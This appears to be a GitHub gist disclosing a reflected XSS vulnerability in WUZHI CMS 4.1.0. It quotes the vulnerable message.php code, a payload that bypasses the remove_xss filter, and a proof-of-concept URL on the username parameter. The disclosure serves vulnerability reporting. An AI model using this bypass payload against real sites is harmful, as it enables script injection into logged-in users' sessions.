Skip to content

Instantly share code, notes, and snippets.

@redeye5

redeye5/wuzhicms v4.1.0 message username reflected xss vulnerability.md

Created February 14, 2019 08:11
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save redeye5/57ccafea7263efec67c82b0503c72480 to your computer and use it in GitHub Desktop.
Save redeye5/57ccafea7263efec67c82b0503c72480 to your computer and use it in GitHub Desktop.
Download ZIP
wuzhicms v4.1.0 message username reflected xss vulnerability
Raw
wuzhicms v4.1.0 message username reflected xss vulnerability.md

A xss vulnerability was discovered in WUZHI CMS 4.1.0

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the username parameter of /index.php?m=message&f=message&v=add

Vulnerability file: coreframe/app/message/message.php

    public function add() {
        $seo_title = '发私信';
        $memberinfo = $this->memberinfo;
        if(isset($GLOBALS['submit'])) {
            ......
        } else {
            $username = isset($GLOBALS['username']) ? remove_xss($GLOBALS['username']) : '';
            //$result_tpl = $this->db->get_list('message_tpl', '', '*', 0, 100, 0, 'tplid DESC');
            include T('message','add');
        }

    }

remove_xss function can be bypassed via payload "><details/open/ontoggle=alert(1)>

PoC:

http://example.com/index.php?m=message&f=message&v=add&username="><details/open/ontoggle=alert(1)>

Triggered when the user is logged in:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment